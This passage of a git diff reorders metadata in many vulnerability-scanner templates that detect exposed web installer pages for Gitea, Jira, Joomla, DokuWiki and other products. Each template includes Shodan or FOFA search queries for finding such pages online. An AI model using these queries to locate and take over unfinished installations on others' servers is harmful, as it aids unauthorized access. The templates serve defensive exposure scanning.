metadata:
verified: true
max-request: 1
- shodan-query: html:"ContentPanel SetupWizard"
- product: control
vendor: connectwise
+ product: control
+ shodan-query: html:"ContentPanel SetupWizard"
tags: misconfig,exposure,install,connectwise
- classification:
- cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml
index 3c58d28f86..630ba6eda0 100644
--- a/http/misconfiguration/installer/custom-xoops-installer.yaml
+++ b/http/misconfiguration/installer/custom-xoops-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects the presence of XOOPS Custom installation page.
reference:
- https://www.exploit-db.com/ghdb/1115
+ classification:
+ cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="XOOPS Custom Installation"
- product: xoops
vendor: xoops
+ product: xoops
+ fofa-query: title="XOOPS Custom Installation"
tags: misconfig,xoops,installer
- classification:
- cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fe6c64399fa97ddc70f654c6d781595518749e45cc05b7cab9b832ce2edcf8da022100b95d4ddf25b8f154239914b4e336defb77e6c685bdc96f9e31fdcd6e6f6bc671:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/discourse-installer.yaml b/http/misconfiguration/installer/discourse-installer.yaml
index 5a083aa657..9085ddc172 100644
--- a/http/misconfiguration/installer/discourse-installer.yaml
+++ b/http/misconfiguration/installer/discourse-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: unknown
description: Discourse is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Discourse Setup"
- product: discourse
vendor: discourse
+ product: discourse
+ shodan-query: title:"Discourse Setup"
tags: misconfig,discourse,install
- classification:
- cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201ea8e1354bc06bd0609e85d1ed297952d0b8077c52cd2862a976055978d7e411022062c47a84f1d694dcf4b5e8d53809ce41657e918297bd438924b175a1e83eb7d7:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402201ea8e1354bc06bd0609e85d1ed297952d0b8077c52cd2862a976055978d7e411022062c47a84f1d694dcf4b5e8d53809ce41657e918297bd438924b175a1e83eb7d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml
index 63cc03ad1f..e99e6b231c 100644
--- a/http/misconfiguration/installer/dokuwiki-installer.yaml
+++ b/http/misconfiguration/installer/dokuwiki-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: DokuWiki is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"DokuWiki"
- product: dokuwiki
vendor: dokuwiki
+ product: dokuwiki
+ shodan-query: title:"DokuWiki"
tags: misconfig,dokuwiki,install,exposure
- classification:
- cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b4eae166b02d173f22d0da3b881033b343d9cd3bff6e4668fdcfef7eaf47283602203ed0a0ad8427cffaf50092e8dcd5474e1d2725a90a1487f84f40622a009f7e44:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b4eae166b02d173f22d0da3b881033b343d9cd3bff6e4668fdcfef7eaf47283602203ed0a0ad8427cffaf50092e8dcd5474e1d2725a90a1487f84f40622a009f7e44:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml
index fd3755f828..8990f47b8b 100644
--- a/http/misconfiguration/installer/dolibarr-installer.yaml
+++ b/http/misconfiguration/installer/dolibarr-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: high
description: Dolibarr is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Dolibarr install or upgrade"
- product: dolibarr_erp\\/crm
vendor: dolibarr
+ product: dolibarr_erp\\/crm
+ shodan-query: title:"Dolibarr install or upgrade"
tags: misconfig,exposure,install
- classification:
- cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220634532cbd8d85911eb5be70b6c6ba95f4e883927aeefa918bb7c7f7eec6c70e402200490d5848a436de703b294c57a533b11b5ef3006488a289b72028e9842d55872:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220634532cbd8d85911eb5be70b6c6ba95f4e883927aeefa918bb7c7f7eec6c70e402200490d5848a436de703b294c57a533b11b5ef3006488a289b72028e9842d55872:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml
index 5ef1e11140..2a0bdfd4ed 100644
--- a/http/misconfiguration/installer/dolphin-installer.yaml
+++ b/http/misconfiguration/installer/dolphin-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Dolphin is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:boonex:dolphin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: icon_hash="-945121295"
- product: dolphin
vendor: boonex
+ product: dolphin
+ fofa-query: icon_hash="-945121295"
tags: misconfig,dolphin,install,exposure
- classification:
- cpe: cpe:2.3:a:boonex:dolphin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml
index 872bdb18da..ac16f29c96 100644
--- a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml
+++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed EJBCA Enterprise Cloud Installation page.
reference:
- https://aws.amazon.com/marketplace/pp/prodview-u2xdo5mkuilke
+ classification:
+ cpe: cpe:2.3:a:primekey:ejbca:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard"
- product: ejbca
vendor: primekey
+ product: ejbca
+ shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard"
tags: misconfig,install,exposure,ejbca
- classification:
- cpe: cpe:2.3:a:primekey:ejbca:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a2e706b8c94579f157f9d6c9567084d9efca7244efa710bd8a17185c2b787fd1022100bee3f9d99ebd4795e3e2730e34f0d70ccac6eb051b20a36d894cd36e401f5b4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/elgg-install.yaml b/http/misconfiguration/installer/elgg-install.yaml
index 20e2dce4e9..b519d5ba95 100644
--- a/http/misconfiguration/installer/elgg-install.yaml
+++ b/http/misconfiguration/installer/elgg-install.yaml
@@ -7,16 +7,16 @@ info:
description: Elgg Installation was discovered.
reference:
- https://github.com/elgg/elgg
- metadata:
- max-request: 1
- verified: true
- fofa-query: title="Welcome to Elgg"
- product: elgg
- vendor: elgg
- tags: install,elgg,exposure,misconfig
-
classification:
cpe: cpe:2.3:a:elgg:elgg:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: elgg
+ product: elgg
+ fofa-query: title="Welcome to Elgg"
+ tags: install,elgg,exposure,misconfig
+
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- 'contains_any(body,"Elgg Install : Welcome", "Installing Elgg", "Welcome to Elgg")'
- 'status_code == 200'
condition: and
-# digest: 4a0a0047304502205eea6dd5e913f95ea9c012b78d1994d5fde3c95ad10b6ec91755aa559a38120a02210095c06cb0e37c6846183ea56612ff208fae3e3dae2526158ecb37c11058a3b0bb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205eea6dd5e913f95ea9c012b78d1994d5fde3c95ad10b6ec91755aa559a38120a02210095c06cb0e37c6846183ea56612ff208fae3e3dae2526158ecb37c11058a3b0bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml
index 519ed52a6e..84dcf12113 100644
--- a/http/misconfiguration/installer/eshop-installer.yaml
+++ b/http/misconfiguration/installer/eshop-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: EShop is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"eShop Installer"
- product: eshop
vendor: oxid-esales
+ product: eshop
+ shodan-query: html:"eShop Installer"
tags: misconfig,eshop,install,exposure
- classification:
- cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b72e0d77fed8b47e8cdb9da1eda690fcb4d5e11b0b6614359d9560e7de36cd8402200347116bdd23cfac7ccc3e2b33f2ac6bbd0b9bb7bffa3e2f8c4dc5a8561931d9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b72e0d77fed8b47e8cdb9da1eda690fcb4d5e11b0b6614359d9560e7de36cd8402200347116bdd23cfac7ccc3e2b33f2ac6bbd0b9bb7bffa3e2f8c4dc5a8561931d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/espocrm-installer.yaml b/http/misconfiguration/installer/espocrm-installer.yaml
index 90ef50240b..2d9a598be5 100644
--- a/http/misconfiguration/installer/espocrm-installer.yaml
+++ b/http/misconfiguration/installer/espocrm-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Espocrm is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Welcome to Espocrm"
- product: espocrm
vendor: espocrm
+ product: espocrm
+ shodan-query: html:"Welcome to Espocrm"
tags: misconfig,espocrm,install,exposure
- classification:
- cpe: cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml
index f68a3bceee..ce0e4f93c1 100644
--- a/http/misconfiguration/installer/facturascripts-installer.yaml
+++ b/http/misconfiguration/installer/facturascripts-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: FacturaScripts is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"FacturaScripts installer"
- product: facturascripts
vendor: facturascripts
+ product: facturascripts
+ shodan-query: html:"FacturaScripts installer"
tags: misconfig,facturascripts,install,exposure
- classification:
- cpe: cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022020a08dcfce34df1143ae7a6029f76d9ed4bfacb7ccd2b01245cd8d743ea3d5eb02203a4aafed8bb6675ad3e181378c7c97bd17bd89e04b723442658dd6d346e5ebbf:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022020a08dcfce34df1143ae7a6029f76d9ed4bfacb7ccd2b01245cd8d743ea3d5eb02203a4aafed8bb6675ad3e181378c7c97bd17bd89e04b723442658dd6d346e5ebbf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml
index d060142e5c..50d99fe46d 100644
--- a/http/misconfiguration/installer/flarum-installer.yaml
+++ b/http/misconfiguration/installer/flarum-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed Flarum installation pages which could allow unauthorized access or information disclosure.
reference:
- https://flarum.org/
+ classification:
+ cpe: cpe:2.3:a:flarum:flarum:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Install Flarum"
- product: flarum
vendor: flarum
+ product: flarum
+ shodan-query: html:"Install Flarum"
tags: misconfig,install,exposure,flarum
- classification:
- cpe: cpe:2.3:a:flarum:flarum:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/fossbilling-installer.yaml b/http/misconfiguration/installer/fossbilling-installer.yaml
index aaf0032044..76d6394f3f 100644
--- a/http/misconfiguration/installer/fossbilling-installer.yaml
+++ b/http/misconfiguration/installer/fossbilling-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
FOSSBilling installation dashboard has been detected.
+ classification:
+ cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"FOSSBilling"
- product: fossbilling
vendor: fossbilling
+ product: fossbilling
+ shodan-query: title:"FOSSBilling"
tags: fossbilling,install,misconfig
- classification:
- cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b7b0f6543091bf4d2e67ee2802feb0a57241e524da29c7f944e2ced8ec8e393c022061aea2773aebd96772ca54801007608b062c90bcf5d646e8ce1f4bc66dc017b7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b7b0f6543091bf4d2e67ee2802feb0a57241e524da29c7f944e2ced8ec8e393c022061aea2773aebd96772ca54801007608b062c90bcf5d646e8ce1f4bc66dc017b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml
index 7c2bd18b07..d84e830ddb 100644
--- a/http/misconfiguration/installer/freshrss-installer.yaml
+++ b/http/misconfiguration/installer/freshrss-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
FreshRSS Installation panel has been exposed.
- metadata:
- max-request: 1
- verified: true
- fofa-query: title="Installation · FreshRSS"
- product: freshrss
- vendor: freshrss
- tags: freshrss,misconfig,install
-
classification:
cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: freshrss
+ product: freshrss
+ fofa-query: title="Installation · FreshRSS"
+ tags: freshrss,misconfig,install
+
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml
index 839e2cc0c8..d239f9e586 100644
--- a/http/misconfiguration/installer/froxlor-installer.yaml
+++ b/http/misconfiguration/installer/froxlor-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects the Froxlor Server Management Panel installation page.
reference:
- https://www.exploit-db.com/ghdb/8397
+ classification:
+ cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="Froxlor Server Management Panel - Installation"
- product: froxlor
vendor: froxlor
+ product: froxlor
+ fofa-query: title="Froxlor Server Management Panel - Installation"
tags: misconfig,froxlor,installer
- classification:
- cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/gitea-installer.yaml b/http/misconfiguration/installer/gitea-installer.yaml
index b8c26bca90..d56ba0bba8 100644
--- a/http/misconfiguration/installer/gitea-installer.yaml
+++ b/http/misconfiguration/installer/gitea-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: medium
description: Gitea is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
- product: gitea
vendor: gitea
+ product: gitea
+ shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
tags: misconfig,gitea,install
- classification:
- cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022066f56b7a2930ae1593161115abd054f1cde3376fff7c907e4d98fda3fe72d90b02210091ea2d42390407b9c1751b0d9f8570ac5d7c9b510f6ca102fddee07b16022220:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022066f56b7a2930ae1593161115abd054f1cde3376fff7c907e4d98fda3fe72d90b02210091ea2d42390407b9c1751b0d9f8570ac5d7c9b510f6ca102fddee07b16022220:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml
index 78f6833c41..829e6d9caf 100644
--- a/http/misconfiguration/installer/glpi-installer.yaml
+++ b/http/misconfiguration/installer/glpi-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed GLPI Setup page.
reference:
- https://glpi-project.org/
+ classification:
+ cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Setup GLPI"
- product: glpi
vendor: glpi-project
+ product: glpi
+ shodan-query: html:"Setup GLPI"
tags: misconfig,install,exposure,glpi
- classification:
- cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml
index fd34a01b0f..74e328874c 100644
--- a/http/misconfiguration/installer/growi-installer.yaml
+++ b/http/misconfiguration/installer/growi-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Checks for the presence of a GROWI Installer.
+ classification:
+ cpe: cpe:2.3:a:weseek:growi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Installer - GROWI"
- product: growi
vendor: weseek
+ product: growi
+ shodan-query: html:"Installer - GROWI"
tags: install,growi,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:weseek:growi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml
index b7bb83dd99..8ac802c79f 100644
--- a/http/misconfiguration/installer/impresspages-installer.yaml
+++ b/http/misconfiguration/installer/impresspages-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: low
description: ImpressPages is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:impresspages:impresspages_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"ImpressPages installation wizard"
- product: impresspages_cms
vendor: impresspages
+ product: impresspages_cms
+ shodan-query: http.title:"ImpressPages installation wizard"
tags: misconfig,exposure,install,impresspages
- classification:
- cpe: cpe:2.3:a:impresspages:impresspages_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ac1631cfa08a1af2bb4a789da010263e7ba43d5c7d160a3cb8ef667ce2b53c21022100a79a9d3c3a686c50cb0b5d39deff192103bd71a98da9081f8270706802715d38:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ac1631cfa08a1af2bb4a789da010263e7ba43d5c7d160a3cb8ef667ce2b53c21022100a79a9d3c3a686c50cb0b5d39deff192103bd71a98da9081f8270706802715d38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/jira-setup.yaml b/http/misconfiguration/installer/jira-setup.yaml
index cb4a6a9c2f..e508944f6a 100644
--- a/http/misconfiguration/installer/jira-setup.yaml
+++ b/http/misconfiguration/installer/jira-setup.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Atlassian JIRA is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"JIRA - JIRA setup"
- product: jira
vendor: atlassian
+ product: jira
+ shodan-query: title:"JIRA - JIRA setup"
tags: misconfig,jira,atlassian,installer
- classification:
- cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202be8e9b1b4f8f254128e5963923eea49de2beb40da3453771615c5facd21c80d022100a29b9eb24be364da07e566b5b74fabcffa33d817f115c504bb3a39dc003d0931:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502202be8e9b1b4f8f254128e5963923eea49de2beb40da3453771615c5facd21c80d022100a29b9eb24be364da07e566b5b74fabcffa33d817f115c504bb3a39dc003d0931:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/joomla-installer.yaml b/http/misconfiguration/installer/joomla-installer.yaml
index 15691152b9..2a4fba8f02 100644
--- a/http/misconfiguration/installer/joomla-installer.yaml
+++ b/http/misconfiguration/installer/joomla-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Joomla is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Joomla Web Installer"
- product: joomla\\!
vendor: joomla
+ product: joomla\\!
+ shodan-query: title:"Joomla Web Installer"
tags: misconfig,joomla,install
- classification:
- cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206999fbe3f32c72ea8527d6ab44e0dc0e4875cc134390924bf587415690565463022100889d4fdd2020d31fc79e6b9e349d5a593d321698c00d48937a5713c2f228e208:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502206999fbe3f32c72ea8527d6ab44e0dc0e4875cc134390924bf587415690565463022100889d4fdd2020d31fc79e6b9e349d5a593d321698c00d48937a5713c2f228e208:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/knowledgetree-installer.yaml b/http/misconfiguration/installer/knowledgetree-installer.yaml
index 402bdcf6ec..8d54d59218 100644
--- a/http/misconfiguration/installer/knowledgetree-installer.yaml
+++ b/http/misconfiguration/installer/knowledgetree-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: KnowledgeTree is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:knowledgetree:knowledgetree:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"KnowledgeTree Installer"
- product: knowledgetree
vendor: knowledgetree
+ product: knowledgetree
+ shodan-query: title:"KnowledgeTree Installer"
tags: misconfig,knowledgetree,install,exposure
- classification:
- cpe: cpe:2.3:a:knowledgetree:knowledgetree:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950
+
